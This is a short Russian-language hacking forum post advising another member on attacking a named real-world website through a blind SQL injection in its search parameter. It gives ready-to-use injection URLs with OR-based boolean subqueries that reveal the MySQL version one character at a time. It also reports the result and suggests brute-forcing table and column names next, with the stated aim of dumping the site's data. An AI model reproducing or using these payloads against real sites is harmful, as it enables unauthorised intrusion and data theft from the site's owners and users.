Сообщение от
Scipio
неувидел там инъекции... с чего ты взял, что она есть?
Вообщем инъекция там есть, правда слепая =\
Для того чтобы была не слепая надо зарегаться на сайте, а это только за $ - поэтому тут надо выбирать либо на халяву но ппц как долго, либо заплатить 1$ и в течении часа все слить =)
Со слепой (если решишь все-таки продолжить) есть один нюанс - подзапросы с
and не катят, поэтому надо через
or - соответственно логика
обратная, пример:
Код:
http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=5)/*&lang=rus
такой запрос выведет норм страницу - значит первая цифра версии не 5!
а вот такой запрос
Код:
http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=4)/*&lang=rus
выведет пустую страницу - значит первая цифра версии 4!
Вообщем я думаю логика понятна =)
Версия там 4.x.x.(MySQL)
дальше если есть желание перебором как написал
Grey по именам таблиц, столбцов и т.д...